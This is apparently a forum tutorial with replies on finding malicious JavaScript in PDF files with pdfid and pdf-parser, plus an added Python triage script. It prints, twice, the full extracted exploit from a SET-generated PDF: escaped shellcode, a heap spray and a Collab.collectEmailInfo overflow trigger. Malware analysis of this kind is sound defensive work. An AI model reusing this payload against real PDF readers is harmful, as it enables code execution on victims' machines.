EvilZone
Hacking and Security => Tutorials => Alkapone, September 30, 2013, 10:54:30 PM
-
This tutorial is going to teach you how to find malicious data within PDF readers.
I find it pretty cool because instead of writing
strings #filename
gdb
objects
etc. etc.
you don't need to know all this, because there is a tool that simplifies pulling information out of the PDF reader, almost like "grep".
What will you need?
Python installed (Windows or Linux)
pdf-reader
pdfid
Now I'm going to write this by myself without looking up information, so if I mess up I'll fix it.
I'm just writing this out to see how much of this I remembered.
When you open up a PDF file: PDF incorporated a JavaScript engine in the PDF reader,
which allows executing JavaScript code.
Malicious hackers will insert this JavaScript code into the objects within a PDF file
and modify strings and whatnot.
So instead of having
/Javascript
a hacker will turn it into something like /jAVAsCRIPT
etc. etc.
An example output:
root@bt:/pentest/forensics/pdfid# python pdfid.py --disarm testfile.pdf
/Open#41#63tion -> /oPEN#61#43TION
/J#61va#53#63r#69#70#74 -> /j#41VA#73#43R#49#50#54
/#4a#53 -> /#6a#73
PDFiD 0.0.11 testfile.pdf
PDF Header: %PDF-1.5
obj 6
endobj 6
stream 1
endstream 1
xref 1
trailer 1
startxref 1
/Page 1(1)
/Encrypt 0
/ObjStm 0
/JS 1(1)
/JavaScript 1(1)
/AA 0
/OpenAction 1(1)
/AcroForm 0
/JBIG2Decode 0
/RichMedia 0
/Launch 0
/Colors > 2^24 0
We can see that there is embedded code within
/JS
/JavaScript
/OpenAction
Notice at the top how OpenAction is changed to something else?
It's to obfuscate it from antiviruses.
Our goal is to pull the JavaScript code out of the (I call them tables, or objects, however you say it).
First command to execute:
Disarm the PDF file
python pdfid.py --disarm testfile.pdf
What this does is change the case of the words to make them something else, so when you open the .pdf file it is safe and nothing will execute.
The (1) indicates that there is obfuscation inside that table.
So now you have basic information:
what's obfuscated.
But now you need to go in deeper. There is a piece of software called
pdf-parser.py
pdf-parser is nothing more than a grep-like utility on Linux, just that it's made for pulling contents out of the PDF file.
So now we need to locate the embedded malicious JavaScript code.
pdf-parser has a grep utility where you can search for certain stuff within the PDF file,
so execute this:
python pdf-parser.py --search javascript filename.pdf
What this will do is search the contents of the PDF file for anything in relation to JavaScript.
So this is what we get back:
obj 5 0
Type: /Action
Referencing: 6 0 R
[(2, '<<'), (2, '/#54#79pe'), (2, '/#41#63#74i#6fn'), (2, '/S'), (2, '/J#61va#53#63r#69#70#74'), (2, '/#4a#53'), (1, ' '), (3, '6'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, '>>')]
<<
/Type /Action
/S /JavaScript
/JS 6 0 R
>>
Things to note here:
1. The object is 5
2. It uses JavaScript
3. As you can see the JavaScript is encoded, but --search still found it, which is awesome
4. /Type /Action
So now we know that JavaScript is included in object 5, and it is getting referenced through object 6 as well.
So what do we do now?
We pretty much just jump to the next location.
Since 5 is referencing 6, and 5 was referenced in the search for JavaScript, we know that the next
one is going to be holding the JavaScript code itself.
Example:
python pdf-parser.py --object 5 --filter testfile.pdf
obj 5 0
Type: /Action
Referencing: 6 0 R
[(2, '<<'), (2, '/#54#79pe'), (2, '/#41#63#74i#6fn'), (2, '/S'), (2, '/J#61va#53#63r#69#70#74'), (2, '/#4a#53'), (1, ' '), (3, '6'), (1, ' '), (3, '0'), (1, ' '), (3, 'R'), (2, '>>')]
<<
/Type /Action
/S /JavaScript
/JS 6 0 R
>>
Notice: /JS 6 0 R
So now we know the JS is being held in table 6.
So now we will jump to it, filter it and paste the JavaScript code:
python pdf-parser.py --object 6 --filter testfile.pdf
obj 6 0
Type:
Referencing:
Contains stream
[(2, '<<'), (2, '/Length'), (1, ' '), (3, '6532'), (2, '/#46ilt#65r'), (2, '['), (2, '/#46#6c#61teDeco#64e'), (2, '/A#53C#49#49He#78Decod#65'), (2, ']'), (2, '>>'), (1, '\r\n')]
<<
/Length 6532
/Filter [
/FlateDecode /ASCIIHexDecode]
>>
And now we finally see the JavaScript code:
>>
'\n\t\tvar ppTeIWbmVyGfyRXaDjrP = unescape("%u67b3%u7b97%u8d05%ueb02%u4076%u0db5%u9f04%uf503%u4299%u14b0%u1da8%u9b3d%u2846%u2cd4%u9849%u4b15%ube24%u197e%u4ff9%ud569%ufc88%u25a9%u3593%u4173%ue086%u273f%u730d%u1840%u89f5%u34e1%u7d37%ue309%uc629%uebc0%ub204%u66b6%ufc80%ubf25%u7224%u7e79%u3f77%u4b78%u2d9f%u747f%u4771%ufd2b%u8db5%u0cb8%u434e%ua942%u979b%u417a%u70b0%u1d3d%u9193%u9215%u14a8%ub390%u3cbb%u7bb4%u214f%ub7f8%u4875%u76b9%u674a%u7cba%u1b05%u11d4%ubed6%u2298%u39e0%u2fe2%ud513%u2c1c%u4696%ub135%u0170%u7beb%u3379%u8cf9%ue1d3%u127a%u49e2%ub699%uf683%u4fe3%u04ba%u25a9%ua83c%ub499%u4bb9%u7515%u7c7e%u0b72%u67f5%u4273%ub8b3%u3f97%u6691%u050c%u2d93%ubfbb%u489b%u8d92%ufc38%u277f%ub73d%u2c71%u370d%u3a9f%u47f9%u1c76%ub2be%ud484%u4996%ub5b1%u8134%u6be0%u4af8%u7443%u9040%ufd30%u7d14%u8735%uc7ff%ud6c1%ud53b%u244e%u9846%u411d%u78b0%u772f%u7f71%ud20a%u76f9%u850c%ue1d1%ub82c%u3270%u74e0%u047e%ud629%ub340%ub9ba%u3d79%ub796%ubb27%u1c99%u8c42%u78e2%u1a15%u24fc%u4e1d%ub02d%u4a05%u9f35%u2a7c%u98f5%u144b%u8d48%u757a%ue309%u340d%u4393%u2567%u9290%ub549%u7791%ueb31%u467d%u3f4f%ub2be%u3772%u6997%u73d4%u7b47%ufd39%ud51a%u66b6%uf819%u3ca9%ubfb4%u9bb1%ua82f%u7e41%u040d%u7d70%u7378%ufc22%u7a74%u970c%u87a8%u1cf9%u7c48%u132f%u7bd5%u4f71%u3479%ub591%u2d9b%u7572%ub84e%ufd6b%uf584%ubbbf%u1d9f%u0243%u32eb%u25e1%u1599%u7614%u7f4b%ue220%ud42b%u4027%u3cb1%ub442%ub0b6%uf785%u66e3%ube92%u9041%u0167%u83d6%u24e0%u4a77%u9305%u4935%u988d%u4637%ub73f%ubab9%u2c47%ufe33%uf8c0%u3db2%ub3a9%u7796%u904f%u2ab8%u93d4%u7641%u3435%u7a7d%uf61b%u66e2%u783f%u2d7b%ub798%u891d%ue3c1%u047f%u0c1c%u05be%u992f%u10ba%u70d5%u497e%u72bf%u6773%u7937%u7174%ud63a%u40b9%u119f%u08eb%u24f5%ub58d%u809b%u86f8%ue1d3%ue038%u3d7c%u9227%u4ba8%u4a47%u0da9%ub048%u183c%ub3f9%u8114%u75fc%ue312%ue130%u7525%u9746%u70b1%ub642%u2377%u91fd%u7db4%u782c%u7c15%u964e%u4373%ub2bb%u7a9f%ue221%ubf4a%u7105%ub54e%u1c7e%u3c7b%u7f93%uf528%u3b91%u41eb%ubb96%u4072%uba34%u3715%u8d0d%u7949%u0425%u46b3%u3db1%u0376%uf9d1%u27be%ud6d2%u0b67%ub2fc%u0ae0%u47f8%u7424%ub714
%ub6d5%ub098%u992f%ud448%u6643%ub94f%ub492%ua8b8%u9042%u1d2d%u2c35%u0c3f%u9ba9%ud088%u4bfd%ud997%ud9ec%u2474%ubaf4%u22d3%uf173%u335d%ub1c9%u314f%u1955%uc583%u0304%u1555%ud731%u198f%u183c%uda70%u905e%ueb95%uc64c%u5ede%u8c40%u52b3%uc02b%ue027%ucd59%u4148%u2bd7%u5266%uf3d6%u9024%u8879%uc536%ub159%u18f8%uf698%ud3e5%uafc8%u4162%uc4fc%u5a37%u0afd%ue23c%u2f85%u9783%u313f%u08d4%u7934%u23cc%u5a12%ue0ed%ua641%u8da4%u5cb1%u4437%u9d88%ua809%ua046%u25a5%ue497%ud602%u1ee2%u6b71%ue4f4%ub70b%uf971%u3cac%ud921%u904d%uaab7%u5d42%uf5bc%u6046%u8e11%ue973%u4194%ua9f2%u45b2%u695e%udcdb%udc3a%u3fe4%u81e2%u4b40%ud501%u16f2%u1a4e%ua8c8%u348e%uda5b%u9bbc%u74f7%u548d%u83d1%u4ef2%u1ca5%u710d%u35d5%u25ca%u2d85%u45fb%uae4e%u9004%ufec0%u4baa%uaea0%u3c0a%ua548%u6384%uc668%u124e%u51af%u8db1%udf2e%ucc59%u1e30%u5921%u4ad6%u0c45%ue341%u15fc%u9219%u8001%u3789%u4f93%u3149%uc788%u161e%u1e7e%u8aca%u88d9%u56e8%uf3bf%u8ca8%ufd7c%u4031%ud938%u9c21%u65c1%u7015%u3394%u36c3%uf24e%ue0bd%u5c3d%u7429%u5f0e%u792f%u295b%uc8cf%u6c32%ue5f0%u78d2%u1b89%u8643%u9840%ucd73%u89c8%u881b%u8b99%u2b41%ucf74%ua87f%ub07c%ub07b%ub5f5%u76c0%uc7e6%u1359%u7b08%u3659");\n\t\tvar oYOROBmmCLBEqUdIzZecdOQUpnHsfDjqFomqPgxfpA ="";\n\t\tfor (ZpDrcUftvhGJJVxycpUcbRLZdOLieFkNDxNgAXSUkOBMbSQevHEEhBeyHrClSFmoPA=128;ZpDrcUftvhGJJVxycpUcbRLZdOLieFkNDxNgAXSUkOBMbSQevHEEhBeyHrClSFmoPA>=0;--ZpDrcUftvhGJJVxycpUcbRLZdOLieFkNDxNgAXSUkOBMbSQevHEEhBeyHrClSFmoPA) oYOROBmmCLBEqUdIzZecdOQUpnHsfDjqFomqPgxfpA += unescape("%u8d04%u2f47");\n\t\tNFUCcQtndVUooRHZwATgByhbEuNlleAg = oYOROBmmCLBEqUdIzZecdOQUpnHsfDjqFomqPgxfpA + ppTeIWbmVyGfyRXaDjrP;\n\t\tHyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm = unescape("%u8d04%u2f47");\n\t\tnjvySTXclahLnqDQflAQegEyLrErmpLgRWosdxWCRpDMIvSNXYpieOXbvVcbbFUnQtrgNZmkFuPiTRCKGSylxY = 20;\n\t\tCEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL = njvySTXclahLnqDQflAQegEyLrErmpLgRWosdxWCRpDMIvSNXYpieOXbvVcbbFUnQtrgNZmkFuPiTRCKGSylxY+NFUCcQtndVUooRHZwATgByhbEuNlleAg.length\n\t\twhile 
(HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.length<CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL) HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm+=HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm;\n\t\tFycriVRmjZpoonOHlGJXpPpUxASUeUAxX = HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.substring(0, CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL);\n\t\tmozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE = HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.substring(0, HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.length-CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL);\n\t\twhile(mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE.length+CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL < 0x40000) mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE = mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE+mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE+FycriVRmjZpoonOHlGJXpPpUxASUeUAxX;\n\t\tSScAIWbChatkWiATJMxqPJgXabjXwwvNCOjcFJyIHJfmvOrETPV = new Array();\n\t\tfor (sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO=0;sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO<1450;sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO++) SScAIWbChatkWiATJMxqPJgXabjXwwvNCOjcFJyIHJfmvOrETPV[sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO] = mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE + NFUCcQtndVUooRHZwATgByhbEuNlleAg;\n\t\tvar rOPWhCJLWUylaHpVzPxubxpwfV = unescape("%u0c0c%u0c0c");\n\t\twhile(rOPWhCJLWUylaHpVzPxubxpwfV.length < 0x4000) rOPWhCJLWUylaHpVzPxubxpwfV+=rOPWhCJLWUylaHpVzPxubxpwfV;\n\t\tthis.collabStore = 
Collab.collectEmailInfo({subj: "",msg: rOPWhCJLWUylaHpVzPxubxpwfV});\n\t\t\t\t\t'
Obviously this is all crowded together, but if we want to organize it to show the code a lot better we will type
python pdf-parser.py --object 6 --filter --raw testfile.pdf
--filter and --raw will output it in a readable format:
var ppTeIWbmVyGfyRXaDjrP = unescape("%u67b3%u7b97%u8d05%ueb02%u4076%u0db5%u9f04%uf503%u4299%u14b0%u1da8%u9b3d%u2846%u2cd4%u9849%u4b15%ube24%u197e%u4ff9%ud569%ufc88%u25a9%u3593%u4173%ue086%u273f%u730d%u1840%u89f5%u34e1%u7d37%ue309%uc629%uebc0%ub204%u66b6%ufc80%ubf25%u7224%u7e79%u3f77%u4b78%u2d9f%u747f%u4771%ufd2b%u8db5%u0cb8%u434e%ua942%u979b%u417a%u70b0%u1d3d%u9193%u9215%u14a8%ub390%u3cbb%u7bb4%u214f%ub7f8%u4875%u76b9%u674a%u7cba%u1b05%u11d4%ubed6%u2298%u39e0%u2fe2%ud513%u2c1c%u4696%ub135%u0170%u7beb%u3379%u8cf9%ue1d3%u127a%u49e2%ub699%uf683%u4fe3%u04ba%u25a9%ua83c%ub499%u4bb9%u7515%u7c7e%u0b72%u67f5%u4273%ub8b3%u3f97%u6691%u050c%u2d93%ubfbb%u489b%u8d92%ufc38%u277f%ub73d%u2c71%u370d%u3a9f%u47f9%u1c76%ub2be%ud484%u4996%ub5b1%u8134%u6be0%u4af8%u7443%u9040%ufd30%u7d14%u8735%uc7ff%ud6c1%ud53b%u244e%u9846%u411d%u78b0%u772f%u7f71%ud20a%u76f9%u850c%ue1d1%ub82c%u3270%u74e0%u047e%ud629%ub340%ub9ba%u3d79%ub796%ubb27%u1c99%u8c42%u78e2%u1a15%u24fc%u4e1d%ub02d%u4a05%u9f35%u2a7c%u98f5%u144b%u8d48%u757a%ue309%u340d%u4393%u2567%u9290%ub549%u7791%ueb31%u467d%u3f4f%ub2be%u3772%u6997%u73d4%u7b47%ufd39%ud51a%u66b6%uf819%u3ca9%ubfb4%u9bb1%ua82f%u7e41%u040d%u7d70%u7378%ufc22%u7a74%u970c%u87a8%u1cf9%u7c48%u132f%u7bd5%u4f71%u3479%ub591%u2d9b%u7572%ub84e%ufd6b%uf584%ubbbf%u1d9f%u0243%u32eb%u25e1%u1599%u7614%u7f4b%ue220%ud42b%u4027%u3cb1%ub442%ub0b6%uf785%u66e3%ube92%u9041%u0167%u83d6%u24e0%u4a77%u9305%u4935%u988d%u4637%ub73f%ubab9%u2c47%ufe33%uf8c0%u3db2%ub3a9%u7796%u904f%u2ab8%u93d4%u7641%u3435%u7a7d%uf61b%u66e2%u783f%u2d7b%ub798%u891d%ue3c1%u047f%u0c1c%u05be%u992f%u10ba%u70d5%u497e%u72bf%u6773%u7937%u7174%ud63a%u40b9%u119f%u08eb%u24f5%ub58d%u809b%u86f8%ue1d3%ue038%u3d7c%u9227%u4ba8%u4a47%u0da9%ub048%u183c%ub3f9%u8114%u75fc%ue312%ue130%u7525%u9746%u70b1%ub642%u2377%u91fd%u7db4%u782c%u7c15%u964e%u4373%ub2bb%u7a9f%ue221%ubf4a%u7105%ub54e%u1c7e%u3c7b%u7f93%uf528%u3b91%u41eb%ubb96%u4072%uba34%u3715%u8d0d%u7949%u0425%u46b3%u3db1%u0376%uf9d1%u27be%ud6d2%u0b67%ub2fc%u0ae0%u47f8%u7424%ub714%ub6d5%
ub098%u992f%ud448%u6643%ub94f%ub492%ua8b8%u9042%u1d2d%u2c35%u0c3f%u9ba9%ud088%u4bfd%ud997%ud9ec%u2474%ubaf4%u22d3%uf173%u335d%ub1c9%u314f%u1955%uc583%u0304%u1555%ud731%u198f%u183c%uda70%u905e%ueb95%uc64c%u5ede%u8c40%u52b3%uc02b%ue027%ucd59%u4148%u2bd7%u5266%uf3d6%u9024%u8879%uc536%ub159%u18f8%uf698%ud3e5%uafc8%u4162%uc4fc%u5a37%u0afd%ue23c%u2f85%u9783%u313f%u08d4%u7934%u23cc%u5a12%ue0ed%ua641%u8da4%u5cb1%u4437%u9d88%ua809%ua046%u25a5%ue497%ud602%u1ee2%u6b71%ue4f4%ub70b%uf971%u3cac%ud921%u904d%uaab7%u5d42%uf5bc%u6046%u8e11%ue973%u4194%ua9f2%u45b2%u695e%udcdb%udc3a%u3fe4%u81e2%u4b40%ud501%u16f2%u1a4e%ua8c8%u348e%uda5b%u9bbc%u74f7%u548d%u83d1%u4ef2%u1ca5%u710d%u35d5%u25ca%u2d85%u45fb%uae4e%u9004%ufec0%u4baa%uaea0%u3c0a%ua548%u6384%uc668%u124e%u51af%u8db1%udf2e%ucc59%u1e30%u5921%u4ad6%u0c45%ue341%u15fc%u9219%u8001%u3789%u4f93%u3149%uc788%u161e%u1e7e%u8aca%u88d9%u56e8%uf3bf%u8ca8%ufd7c%u4031%ud938%u9c21%u65c1%u7015%u3394%u36c3%uf24e%ue0bd%u5c3d%u7429%u5f0e%u792f%u295b%uc8cf%u6c32%ue5f0%u78d2%u1b89%u8643%u9840%ucd73%u89c8%u881b%u8b99%u2b41%ucf74%ua87f%ub07c%ub07b%ub5f5%u76c0%uc7e6%u1359%u7b08%u3659");
var oYOROBmmCLBEqUdIzZecdOQUpnHsfDjqFomqPgxfpA ="";
for (ZpDrcUftvhGJJVxycpUcbRLZdOLieFkNDxNgAXSUkOBMbSQevHEEhBeyHrClSFmoPA=128;ZpDrcUftvhGJJVxycpUcbRLZdOLieFkNDxNgAXSUkOBMbSQevHEEhBeyHrClSFmoPA>=0;--ZpDrcUftvhGJJVxycpUcbRLZdOLieFkNDxNgAXSUkOBMbSQevHEEhBeyHrClSFmoPA) oYOROBmmCLBEqUdIzZecdOQUpnHsfDjqFomqPgxfpA += unescape("%u8d04%u2f47");
NFUCcQtndVUooRHZwATgByhbEuNlleAg = oYOROBmmCLBEqUdIzZecdOQUpnHsfDjqFomqPgxfpA + ppTeIWbmVyGfyRXaDjrP;
HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm = unescape("%u8d04%u2f47");
njvySTXclahLnqDQflAQegEyLrErmpLgRWosdxWCRpDMIvSNXYpieOXbvVcbbFUnQtrgNZmkFuPiTRCKGSylxY = 20;
CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL = njvySTXclahLnqDQflAQegEyLrErmpLgRWosdxWCRpDMIvSNXYpieOXbvVcbbFUnQtrgNZmkFuPiTRCKGSylxY+NFUCcQtndVUooRHZwATgByhbEuNlleAg.length
while (HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.length<CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL) HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm+=HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm;
FycriVRmjZpoonOHlGJXpPpUxASUeUAxX = HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.substring(0, CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL);
mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE = HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.substring(0, HyLcEufmamVujjHdLGDMmHRjTyYXdcCWwpbeyuPwUaMjlGVgmSUtccVFvlLdbziuLtkaPKimyGyCRWuNMm.length-CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL);
while(mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE.length+CEXKRrJbAFfpfuIpYYZTzKqBzIARZQmJXbanMCaqmFJSTogxcFL < 0x40000) mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE = mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE+mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE+FycriVRmjZpoonOHlGJXpPpUxASUeUAxX;
SScAIWbChatkWiATJMxqPJgXabjXwwvNCOjcFJyIHJfmvOrETPV = new Array();
for (sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO=0;sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO<1450;sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO++) SScAIWbChatkWiATJMxqPJgXabjXwwvNCOjcFJyIHJfmvOrETPV[sSsVzJpIycEDqyIgEANueREOCklEZbvYdaoCXhYqsmQRoREigNuPaYOlXQHPTUmfMJYfQOMSRwpYbTElpXePdxuPgPKEO] = mozkkiLgChlruHYGVaDyutYQghwSGSfZRGvTjZqtRrmEFprhxaadUpEEHkE + NFUCcQtndVUooRHZwATgByhbEuNlleAg;
var rOPWhCJLWUylaHpVzPxubxpwfV = unescape("%u0c0c%u0c0c");
while(rOPWhCJLWUylaHpVzPxubxpwfV.length < 0x4000) rOPWhCJLWUylaHpVzPxubxpwfV+=rOPWhCJLWUylaHpVzPxubxpwfV;
this.collabStore = Collab.collectEmailInfo({subj: "",msg: rOPWhCJLWUylaHpVzPxubxpwfV});
Which is now readable.
But since this software uses
/FlateDecode /ASCIIHexDecode]
you have to find a way to decrypt it.
I found a site that helps in analyzing those types of encryptions, which can be located at
http://wepawet.cs.ucsb.edu.com
I was using SET (Social-Engineer Toolkit) to generate a malicious .pdf file
and then I analyzed it with these tools.
Note: Not all malicious PDF files will incorporate that as an encryption method, and you may just get lucky.
Sometimes there will be and sometimes there won't. There are like 4 other methods of encryption for this.
The encrypted JavaScript code you see up there was done by the SET encryption thing.
Anyways, I hope you learned something from this.
And if I wrote this tutorial shittily, I'm sorry.
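The two mechanics the tutorial relies on, hex-escaped names (/J#61va#53#63r#69#70#74 is just /JavaScript with some bytes written as #xx) and case-swapping "disarm", can be shown in a few dozen lines. The following is an added example written for this page; it is not the tutorial's code and not Didier Stevens' pdfid or pdf-parser. The keyword list is the subset that appears in the tutorial's pdfid output, the set of names it disarms is an assumption chosen for the example, and the sample PDF is constructed inline (its only script body is a harmless app.alert) using the same escaped spellings the tutorial shows.

```python
"""Mini pdfid-style triage and disarm (added example, not pdfid's own code).

It scans the raw bytes of a PDF for names, resolves #xx escapes so hidden
keywords are counted, lists which objects carry a keyword (like --search),
and "disarms" the file by swapping the case of selected keywords in place,
which keeps every byte offset (and so the xref table) intact."""
import re
from collections import Counter

# Keywords pdfid reports on (the ones present in the tutorial's output).
KEYWORDS = ["/Page", "/Encrypt", "/ObjStm", "/JS", "/JavaScript", "/AA",
            "/OpenAction", "/AcroForm", "/JBIG2Decode", "/RichMedia", "/Launch"]
# Names neutralised by disarm(): an assumed set chosen for this example.
DISARM = {"/JS", "/JavaScript", "/AA", "/OpenAction", "/Launch", "/RichMedia"}

# A PDF name is "/" followed by regular characters: anything except
# whitespace and the delimiters ( ) < > [ ] { } / %.
NAME_RE = re.compile(rb"/([^\s()<>\[\]{}/%]*)")
# Indirect objects: "N G obj ... endobj" (good enough for uncompressed files).
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.S)
HEX_ESC = re.compile(rb"#([0-9A-Fa-f]{2})")


def decode_name(raw: bytes) -> str:
    """Resolve #xx escapes in a raw name body and return it with its slash."""
    plain = HEX_ESC.sub(lambda m: bytes([int(m.group(1), 16)]), raw)
    return "/" + plain.decode("latin-1")


def keyword_stats(data: bytes, keywords=KEYWORDS) -> dict:
    """{keyword: (total occurrences, occurrences written with #xx escapes)},
    the two numbers pdfid prints as 'N(M)'."""
    total, escaped = Counter(), Counter()
    for m in NAME_RE.finditer(data):
        raw = m.group(1)
        name = decode_name(raw)
        if name in keywords:
            total[name] += 1
            if b"#" in raw:
                escaped[name] += 1
    return {k: (total[k], escaped[k]) for k in keywords}


def objects_with(data: bytes, keyword: str) -> list:
    """Object numbers whose body contains `keyword`, matched on the decoded
    name so escaped spellings are found as well."""
    hits = []
    for m in OBJ_RE.finditer(data):
        body = m.group(3)
        if any(decode_name(n.group(1)) == keyword for n in NAME_RE.finditer(body)):
            hits.append(int(m.group(1)))
    return hits


def disarm_name(raw: bytes) -> bytes:
    """Swap the case of every letter in a raw name body, including letters
    hidden inside #xx escapes; escapes stay escapes, so the length is unchanged."""
    out = bytearray()
    i = 0
    while i < len(raw):
        if raw[i:i + 1] == b"#" and HEX_ESC.fullmatch(raw[i:i + 3]):
            ch = bytes([int(raw[i + 1:i + 3], 16)]).swapcase()
            out += b"#%02x" % ch[0]
            i += 3
        else:
            out += raw[i:i + 1].swapcase()
            i += 1
    return bytes(out)


def disarm(data: bytes, names=DISARM):
    """Return (disarmed bytes, list of (old, new) name replacements)."""
    changes = []

    def repl(m):
        raw = m.group(1)
        if decode_name(raw) in names:
            new = disarm_name(raw)
            changes.append((b"/" + raw, b"/" + new))
            return b"/" + new
        return m.group(0)

    return NAME_RE.sub(repl, data), changes


# Constructed sample: a tiny PDF skeleton hiding /OpenAction, /JavaScript and
# /JS behind the same escapes as the tutorial's output. The script is benign.
SAMPLE_PDF = (
    b"%PDF-1.5\n"
    b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /Open#41#63tion 5 0 R >>\nendobj\n"
    b"2 0 obj\n<< /Type /Pages /Kids [3 0 R] /Count 1 >>\nendobj\n"
    b"3 0 obj\n<< /Type /Page /Parent 2 0 R >>\nendobj\n"
    b"5 0 obj\n<< /#54#79pe /#41#63#74i#6fn /S /J#61va#53#63r#69#70#74 /#4a#53 6 0 R >>\nendobj\n"
    b"6 0 obj\n<< /Length 13 >>\nstream\napp.alert(1);\nendstream\nendobj\n"
    b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"
)

if __name__ == "__main__":
    for k, (n, esc) in keyword_stats(SAMPLE_PDF).items():
        print(f"{k:14} {n}({esc})")
    print("objects using /JavaScript:", objects_with(SAMPLE_PDF, "/JavaScript"))
    safe, changes = disarm(SAMPLE_PDF)
    for old, new in changes:
        print(old.decode(), "->", new.decode())
    assert len(safe) == len(SAMPLE_PDF)  # offsets referenced by xref stay valid
```

Running it prints the same three rewrites the tutorial's pdfid run shows (/Open#41#63tion -> /oPEN#61#43TION and so on), and a second keyword_stats() pass over the disarmed bytes reports 0 for those keywords, because matching is exact on the decoded name; that is why triage counts are taken before disarming. Two caveats carry over from the raw-byte approach: names inside compressed object streams are invisible to this scan (which is the reason pdfid reports an /ObjStm count), and the viewer's own tolerance decides what "disarmed" means, so a disarmed copy is for analysis, not a proof that the original is safe.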
-
You could do something about the text formatting, maybe use bold for the titles etc.
Apart from that I think it's a nice share, thanks for contributing :)
+1
-
That's a good tutorial, but I have to agree with proxx. I don't like the numerous empty lines, that looks like you wanted to stretch it or something.
+1 for you
-
I agree, great tutorial.
+1
-
+1 for trying, now format it :)
-
Nice share, but the sandbox will block everything malicious in the PDF reader. I had some malicious PDFs from 2008; they don't execute anymore.
Dunno if the sandbox is broken yet.
-
> Nice share, but the sandbox will block everything malicious in the PDF reader. I had some malicious PDFs from 2008; they don't execute anymore.
> Dunno if the sandbox is broken yet.
If you scan it using VirusTotal, that service checks for abnormalities and scripts in the document too.
-
